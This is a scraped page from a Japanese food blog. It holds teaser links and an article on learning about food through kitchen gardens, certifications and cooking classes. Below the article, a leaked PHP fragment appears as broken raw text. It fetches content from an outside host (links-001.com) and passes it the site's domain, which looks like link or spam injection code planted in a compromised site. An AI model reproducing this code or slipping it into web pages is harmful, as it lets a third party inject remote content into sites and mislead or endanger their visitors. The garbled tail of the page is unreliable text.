前へ
次へ

話に困ったら給食の話

人との会話でこまったり、初対面の方と盛り上がる話をしたいと考えているなら、給食の話が一番です。なぜか

more

地方のB級グルメで食を楽しもう

少し前からB級グルメというものが流行しています。いろいろな地域で町おこしのために、地元の食材を用いて

more

季節の食べ物を美味しくいただく

本来は夏野菜のきゅうりやトマトですが、最近では一年中手に入ります。もちろん温室もののために価格は多少

more

食を学ぶ機会はどこにでもある

最近は食育という言葉もあり、意識して学ぶことがよしとされています。しかし、日常生活でも学校や会社でも、学べることはたくさんあります。例えば、ごく簡単な家庭菜園をしてミニトマトを育てることでも学べます。ときどき小さな子どもの中には好き嫌いがあったりして、「この野菜は絶対に口に入れない」という困ったこともあります。でも、子供が小さければ小さいほど、家庭菜園で作物を育ててみる作戦は成功しやすいです。自分でタネを撒き、水をやって、日に日に育つ野菜を見せていると、どうしても愛着を抱きます。例えばトマトが嫌いな子供でも、自分で育てて初めて収穫したとあっては「嫌いだからいらない」などと無視はできません。今まで見向きもしなかったくせに、現金にも「美味しい、大好き」などと好き嫌いが直ってしまうこともあります。逆に「体にいいから」という押し付けはかえって反発を招きます。また、「自分で育てた野菜は美味しい」と子供が言ったら、からかわずに「よかったね」と言ってあげましょう。また、社会人になってからでも食を学ぶことは可能です。もともと興味を持っている人ならそれに関係する資格の勉強をしてみるのもいいでしょう。オーガニック野菜やハーブの資格、ワインの資格などもあります。調理に興味があるなら料理教室に通ってみてもレパートリーが増えて楽しいはずです。家庭料理を食べる機会があまりなく、自炊も不得意で好き嫌いが多い、という人もいるでしょう。そういう人は、グルメ漫画やドラマなどで美味しいものに興味が湧くこともあるかもしれません。生まれ育った家庭では手作り料理の体験が少なくても、大人になってから料理にハマる人も多いです。ランチの時間に周りの店を開拓したり、そこで試した料理を参考に自炊するのも楽しいです。人間が健康に生きていく上で最も大事な要素ですから、一生楽しみながら勉強し続けていこう、くらいに考えてちょうどいいのではないでしょうか。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top